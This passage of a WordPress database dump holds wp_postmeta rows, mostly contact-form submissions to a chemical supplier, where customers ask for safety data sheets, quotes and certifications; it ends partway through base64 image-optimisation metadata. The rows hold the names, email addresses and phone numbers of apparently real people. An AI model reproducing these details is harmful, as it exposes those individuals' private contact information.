INSERT INTO `wp_postmeta` VALUES (28513, 3371, '_field_16', 'testtestsestset'); 
INSERT INTO `wp_postmeta` VALUES (28514, 3371, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (28515, 3371, '_sub_id', '3371'); 
INSERT INTO `wp_postmeta` VALUES (28516, 3372, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28517, 3372, '_seq_num', '191'); 
INSERT INTO `wp_postmeta` VALUES (28518, 3372, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28519, 3372, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28520, 3372, '_field_1', 'Zayyan Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (28521, 3372, '_field_10', 'Miller-Stephenson Chemical Co.'); 
INSERT INTO `wp_postmeta` VALUES (28522, 3372, '_field_2', 'zchowdhury@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (28523, 3372, '_field_8', '(203) 743-4447'); 
INSERT INTO `wp_postmeta` VALUES (28524, 3372, '_field_3', 'testestestestestesrt'); 
INSERT INTO `wp_postmeta` VALUES (28525, 3372, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28526, 3372, '_sub_id', '3372'); 
INSERT INTO `wp_postmeta` VALUES (28527, 2226, '_oembed_22301ec39d9a5757f8cfbc5498598c59', '{{unknown}}'); 
INSERT INTO `wp_postmeta` VALUES (28528, 1276, '_oembed_22301ec39d9a5757f8cfbc5498598c59', '{{unknown}}'); 
INSERT INTO `wp_postmeta` VALUES (28529, 1268, '_oembed_22301ec39d9a5757f8cfbc5498598c59', '{{unknown}}'); 
INSERT INTO `wp_postmeta` VALUES (28530, 3373, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28531, 3373, '_seq_num', '192'); 
INSERT INTO `wp_postmeta` VALUES (28532, 3373, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28533, 3373, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28534, 3373, '_field_1', 'Victoria Klausler'); 
INSERT INTO `wp_postmeta` VALUES (28535, 3373, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (28536, 3373, '_field_2', 'vok1311@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (28537, 3373, '_field_8', '2489241034'); 
INSERT INTO `wp_postmeta` VALUES (28538, 3373, '_field_3', 'Inv #551765 MS907\r\nI recently purchased this item the product was not fresh  part A seems to have hardened.  What is the shelf life? I have used this in the past without any issues is there another product you could recommend?\r\nRegards Vicky'); 
INSERT INTO `wp_postmeta` VALUES (28539, 3373, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28540, 3373, '_sub_id', '3373'); 
INSERT INTO `wp_postmeta` VALUES (28541, 3374, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28542, 3374, '_seq_num', '193'); 
INSERT INTO `wp_postmeta` VALUES (28543, 3374, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28544, 3374, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28545, 3374, '_field_1', 'MOUGEL Stephane'); 
INSERT INTO `wp_postmeta` VALUES (28546, 3374, '_field_10', 'HONEYWELL AEROSPACE'); 
INSERT INTO `wp_postmeta` VALUES (28547, 3374, '_field_2', 'stephane.mougel@honeywell.com'); 
INSERT INTO `wp_postmeta` VALUES (28548, 3374, '_field_8', '(053) 456-1623'); 
INSERT INTO `wp_postmeta` VALUES (28549, 3374, '_field_3', 'Bonjour,\r\nI am looking for the safety data sheet for Acrylic Conformal Coatings/MS-475C to update my risk assessment on site.\r\nThanks.'); 
INSERT INTO `wp_postmeta` VALUES (28550, 3374, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28551, 3374, '_sub_id', '3374'); 
INSERT INTO `wp_postmeta` VALUES (28552, 622, '_oembed_eb1a2ba5368f6036f51bbd532b650f1a', '{{unknown}}'); 
INSERT INTO `wp_postmeta` VALUES (28553, 3375, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28554, 3375, '_seq_num', '194'); 
INSERT INTO `wp_postmeta` VALUES (28555, 3375, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28556, 3375, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28557, 3375, '_field_1', 'Marco'); 
INSERT INTO `wp_postmeta` VALUES (28558, 3375, '_field_10', 'ZiYoung technology co., LTD'); 
INSERT INTO `wp_postmeta` VALUES (28559, 3375, '_field_2', 'Marco.qin@zytechcn.com'); 
INSERT INTO `wp_postmeta` VALUES (28560, 3375, '_field_8', '(136) 312-9691'); 
INSERT INTO `wp_postmeta` VALUES (28561, 3375, '_field_3', 'This is Marco from China, we are looking for the solvent which can remove the cured glue.  we would like to purchase Stripping Agent MS-11. is there agent in China? or Can we be your agent in China?'); 
INSERT INTO `wp_postmeta` VALUES (28562, 3375, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28563, 3375, '_sub_id', '3375'); 
INSERT INTO `wp_postmeta` VALUES (28564, 3377, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28565, 3377, '_seq_num', '195'); 
INSERT INTO `wp_postmeta` VALUES (28566, 3377, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28567, 3377, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28568, 3377, '_field_1', 'kathleen hernandez'); 
INSERT INTO `wp_postmeta` VALUES (28569, 3377, '_field_10', 'spacemicro, inc'); 
INSERT INTO `wp_postmeta` VALUES (28570, 3377, '_field_2', 'khernandez@spacemicro.com'); 
INSERT INTO `wp_postmeta` VALUES (28571, 3377, '_field_8', '(858) 332-0700'); 
INSERT INTO `wp_postmeta` VALUES (28572, 3377, '_field_3', 'We ordered XP1A0 and received the SDS but I cannot locate the NFPA \ninformation within the information.   This is a requirement for use in our facility.  Please send the data as soon as possible.\nThank you,\nKathy'); 
INSERT INTO `wp_postmeta` VALUES (28573, 3377, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28574, 3377, '_sub_id', '3377'); 
INSERT INTO `wp_postmeta` VALUES (28575, 3378, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28576, 3378, '_seq_num', '196'); 
INSERT INTO `wp_postmeta` VALUES (28577, 3378, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28578, 3378, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28579, 3378, '_field_1', 'Todd Britton'); 
INSERT INTO `wp_postmeta` VALUES (28580, 3378, '_field_10', 'Tryba Architects'); 
INSERT INTO `wp_postmeta` VALUES (28581, 3378, '_field_2', 'tbritton@trybaarchitects.com'); 
INSERT INTO `wp_postmeta` VALUES (28582, 3378, '_field_8', '(303) 913-0455'); 
INSERT INTO `wp_postmeta` VALUES (28583, 3378, '_field_3', 'Hello,\r\n\r\nI would like to talk with someone about low viscosity epoxy and associated tints for use in a 3d-printing process.\r\n\r\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (28584, 3378, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28585, 3378, '_sub_id', '3378'); 
INSERT INTO `wp_postmeta` VALUES (28586, 3379, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (28587, 3379, '_seq_num', '186'); 
INSERT INTO `wp_postmeta` VALUES (28588, 3379, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28589, 3379, '_field_12', 'Odis Kerbow'); 
INSERT INTO `wp_postmeta` VALUES (28590, 3379, '_field_13', 'Systronix, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (28591, 3379, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (28592, 3379, '_field_14', 'odkerbow@systronix-inc.com'); 
INSERT INTO `wp_postmeta` VALUES (28593, 3379, '_field_15', '(281) 276-7012'); 
INSERT INTO `wp_postmeta` VALUES (28594, 3379, '_field_16', 'I am in need of a release agent for a tiny part that has a coil of very fine magnet wire wrapped around it.  The coil has to be removed from the part after curing a varnish that is applied to it as it is wound.  The varnish can be cured at 125 degrees C.  After the varnish is cured the coil is held together by the varnish but must be removed from the tiny part (winding fixture) and attached to another assembly.  It appears that an aerosol application of your MS-122 or MS143 might be the answer that I need.  Your recommendation will be greatly appreciated.'); 
INSERT INTO `wp_postmeta` VALUES (28595, 3379, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (28596, 3379, '_sub_id', '3379'); 
INSERT INTO `wp_postmeta` VALUES (28597, 3380, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28598, 3380, '_seq_num', '197'); 
INSERT INTO `wp_postmeta` VALUES (28599, 3380, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28600, 3380, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28601, 3380, '_field_1', 'Yongwen Gao'); 
INSERT INTO `wp_postmeta` VALUES (28602, 3380, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (28603, 3380, '_field_2', 'gaoy@olypen.com'); 
INSERT INTO `wp_postmeta` VALUES (28604, 3380, '_field_8', '(360) 640-4365'); 
INSERT INTO `wp_postmeta` VALUES (28605, 3380, '_field_3', 'Hello, I&#039;d like to order 12 can MS-222N aero-duster for my research. Please show me the price (including shipping) and how to put the order online. Thanks in advance, Yongwen'); 
INSERT INTO `wp_postmeta` VALUES (28606, 3380, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28607, 3380, '_sub_id', '3380'); 
INSERT INTO `wp_postmeta` VALUES (28608, 3383, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28609, 3383, '_seq_num', '198'); 
INSERT INTO `wp_postmeta` VALUES (28610, 3383, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28611, 3383, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28612, 3383, '_field_1', 'Cynthia Fleury'); 
INSERT INTO `wp_postmeta` VALUES (28613, 3383, '_field_10', 'Stelia Aéronautique Canada'); 
INSERT INTO `wp_postmeta` VALUES (28614, 3383, '_field_2', 'cynthia.fleury@stelia-aerospace.com'); 
INSERT INTO `wp_postmeta` VALUES (28615, 3383, '_field_8', '(450) 595-8300'); 
INSERT INTO `wp_postmeta` VALUES (28616, 3383, '_field_3', 'Hi,\n\nWe are buying some of your chemicals product going through distributor and we need to have a copy of you AS9001 certification for this site :\n\n55 BACKUS AVE	06810-7328	DANBURY	US\n\nHope you can help me!\n\nBest regards,\n'); 
INSERT INTO `wp_postmeta` VALUES (28617, 3383, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28618, 3383, '_sub_id', '3383'); 
INSERT INTO `wp_postmeta` VALUES (28619, 3384, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (28620, 3384, '_seq_num', '187'); 
INSERT INTO `wp_postmeta` VALUES (28621, 3384, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28622, 3384, '_field_12', 'Gail Prato'); 
INSERT INTO `wp_postmeta` VALUES (28623, 3384, '_field_13', 'ITW EAE'); 
INSERT INTO `wp_postmeta` VALUES (28624, 3384, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (28625, 3384, '_field_14', 'gprato@itweae.com'); 
INSERT INTO `wp_postmeta` VALUES (28626, 3384, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (28627, 3384, '_field_16', 'Please provide a SDS for item GREASE KRYTOX GPL207 50 ML'); 
INSERT INTO `wp_postmeta` VALUES (28628, 3384, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (28629, 3384, '_sub_id', '3384'); 
INSERT INTO `wp_postmeta` VALUES (28630, 3385, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28631, 3385, '_seq_num', '199'); 
INSERT INTO `wp_postmeta` VALUES (28632, 3385, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28633, 3385, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28634, 3385, '_field_1', 'ARIZI'); 
INSERT INTO `wp_postmeta` VALUES (28635, 3385, '_field_10', 'GOLDSTONE MIDDLE ESAT '); 
INSERT INTO `wp_postmeta` VALUES (28636, 3385, '_field_2', 'goldston@emirates.net.ae'); 
INSERT INTO `wp_postmeta` VALUES (28637, 3385, '_field_8', '(971) 043-9776'); 
INSERT INTO `wp_postmeta` VALUES (28638, 3385, '_field_3', 'dear   sir \nwe are   manufacturer of tire in middle East   looking for  releasing agent for     Bladder \n\nplease give us  offer and   TDS if it is in range of your products \n\nregards.arizi'); 
INSERT INTO `wp_postmeta` VALUES (28639, 3385, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28640, 3385, '_sub_id', '3385'); 
INSERT INTO `wp_postmeta` VALUES (28641, 3386, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28642, 3386, '_seq_num', '200'); 
INSERT INTO `wp_postmeta` VALUES (28643, 3386, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28644, 3386, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28645, 3386, '_field_1', 'Jacob Randlett'); 
INSERT INTO `wp_postmeta` VALUES (28646, 3386, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (28647, 3386, '_field_2', 'AP-NorthAmerica@lonza.com'); 
INSERT INTO `wp_postmeta` VALUES (28648, 3386, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (28649, 3386, '_field_3', 'Hello,\n\nWe are looking to get an updated 2016 W9 form for your company. If you can, please send the form to AP-NorthAmerica@lonza.com. \n\nThank you for your assistance,\nJake Randlett\nAP Specialist\n'); 
INSERT INTO `wp_postmeta` VALUES (28650, 3386, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28651, 3386, '_sub_id', '3386'); 
INSERT INTO `wp_postmeta` VALUES (28652, 3387, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28653, 3387, '_seq_num', '201'); 
INSERT INTO `wp_postmeta` VALUES (28654, 3387, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28655, 3387, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28656, 3387, '_field_1', 'Yueping Jin'); 
INSERT INTO `wp_postmeta` VALUES (28657, 3387, '_field_10', 'GE Energy Hangzhou Company Limited'); 
INSERT INTO `wp_postmeta` VALUES (28658, 3387, '_field_2', 'yueping.jin@ge.com'); 
INSERT INTO `wp_postmeta` VALUES (28659, 3387, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (28660, 3387, '_field_3', 'Dir Sir,\nI&#039;m Yueping Jin from GE Hangzhou company, writing for MS-143H PTFE Release Agent/Dry Lubricant (GE part No. A50A313B0P0020). Would you like to send me MS-143H TDS &amp; MSDS and apllication instruction (I can&#039;t find in Website).\nThanks in advance.\n\nBest Regards, \nYueping Jin'); 
INSERT INTO `wp_postmeta` VALUES (28661, 3387, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28662, 3387, '_sub_id', '3387'); 
INSERT INTO `wp_postmeta` VALUES (28663, 3388, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28664, 3388, '_seq_num', '202'); 
INSERT INTO `wp_postmeta` VALUES (28665, 3388, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28666, 3388, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28667, 3388, '_field_1', 'Wendy Wong'); 
INSERT INTO `wp_postmeta` VALUES (28668, 3388, '_field_10', 'HongKong Ideas PCB Technology Ltd.'); 
INSERT INTO `wp_postmeta` VALUES (28669, 3388, '_field_2', 'wendy@ideaspcb.com'); 
INSERT INTO `wp_postmeta` VALUES (28670, 3388, '_field_8', '13510820696'); 
INSERT INTO `wp_postmeta` VALUES (28671, 3388, '_field_3', 'Dear,\r\n\r\nGood day!\r\n\r\nWe are a professional manufacturer in China with \r\n\r\nspecialization in PCBA &amp; FPC &amp;PCB(including \r\n\r\nStencil &amp; Components), from prototype to mass \r\n\r\nproduction.\r\n         \r\nAdvantages: no MOQ rule, low price, good quality, \r\n\r\nprompt response,multilayer boards, ate boards and \r\n\r\ncustom PCB.\r\n\r\nIf there will be a cooperative chance between us, \r\n\r\nplease kindly contact me. Thanks!\r\n\r\nBest Regards\r\nWendy'); 
INSERT INTO `wp_postmeta` VALUES (28672, 3388, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28673, 3388, '_sub_id', '3388'); 
INSERT INTO `wp_postmeta` VALUES (28674, 3389, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28675, 3389, '_seq_num', '203'); 
INSERT INTO `wp_postmeta` VALUES (28676, 3389, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28677, 3389, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28678, 3389, '_field_1', 'Keith Beaudean'); 
INSERT INTO `wp_postmeta` VALUES (28679, 3389, '_field_10', 'AMETEK'); 
INSERT INTO `wp_postmeta` VALUES (28680, 3389, '_field_2', 'Keith.Beaudean@ametek.com'); 
INSERT INTO `wp_postmeta` VALUES (28681, 3389, '_field_8', '(302) 456-4417'); 
INSERT INTO `wp_postmeta` VALUES (28682, 3389, '_field_3', 'I need a price quote for 12 of your PRECISION CLEANING SOLVENT 16 OZ C0720A  (# MS580).\nThanks,\n\nKeith'); 
INSERT INTO `wp_postmeta` VALUES (28683, 3389, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28684, 3389, '_sub_id', '3389'); 
INSERT INTO `wp_postmeta` VALUES (28692, 3369, 'wpfc_optimisation_reduction', '1623279'); 
INSERT INTO `wp_postmeta` VALUES (28693, 3369, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvTVMtNTUwTi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL01TLTU1ME4uanBnIiwid2lkdGgiOjI1OTIsImhlaWdodCI6MTcyOCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL01TLTU1ME4uanBnIiwicmVkdWN0aW9uIjoxNjIzMjc2LCJ0aW1lIjoxNDgzNTQ2NTIyLCJpZCI6IjMzNjkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL01TLTU1ME4tMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9NUy01NTBOLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvTVMtNTUwTi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjUyNywiaWQiOjMzNjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvTVMtNTUwTi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL01TLTU1ME4tODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9NUy01NTBOLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NTI5LCJpZCI6MzM2OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9NUy01NTBOLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvTVMtNTUwTi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL01TLTU1ME4tNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY1MzMsImlkIjozMzY5fV0='); 
INSERT INTO `wp_postmeta` VALUES (28694, 3366, 'wpfc_optimisation_reduction', '362964'); 
INSERT INTO `wp_postmeta` VALUES (28695, 3366, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvU2tpbi1EZWdyZWFzZXItSC0xMTEyQi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL1NraW4tRGVncmVhc2VyLUgtMTExMkIuanBnIiwid2lkdGgiOjI0NDgsImhlaWdodCI6MzI2NCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL1NraW4tRGVncmVhc2VyLUgtMTExMkIuanBnIiwicmVkdWN0aW9uIjozNjI5NTYsInRpbWUiOjE0ODM1NDY1MzcsImlkIjoiMzM2NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvU2tpbi1EZWdyZWFzZXItSC0xMTEyQi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL1NraW4tRGVncmVhc2VyLUgtMTExMkItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9Ta2luLURlZ3JlYXNlci1ILTExMTJCLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NTQwLCJpZCI6MzM2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9Ta2luLURlZ3JlYXNlci1ILTExMTJCLTYwMHg4MDAuanBnIiwid2lkdGgiOjYwMCwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvU2tpbi1EZWdyZWFzZXItSC0xMTEyQi02MDB4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL1NraW4tRGVncmVhc2VyLUgtMTExMkItNjAweDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY1NDMsImlkIjozMzY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL1NraW4tRGVncmVhc2VyLUgtMTExMkItNzY4eDEwMjQuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0IjoxMDI0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL1NraW4tRGVncmVhc2VyLUgtMTExMkItNzY4eDEwMjQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvU2tpbi1EZWdyZWFzZXItSC0xMTEyQi03Njh4MTAyNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY1NDcsImlkIjozMzY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL1NraW4tRGVncmVhc2VyLUgtMTExMkItMTIwMHgxNjAwLmpwZyIsIndpZHRoIjoxMjAwLCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvU2tpbi1EZWdyZWFzZXItSC0xMTEyQi0xMjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvU2tpbi1EZWdyZWFzZXItSC0xMTEyQi0xMjAweDE2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NTUyLCJpZCI6MzM2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9Ta2luLURlZ3JlYXNlci1ILTExMTJCLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvU2tpbi1EZWdyZWFzZXItSC0xMTEyQi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC9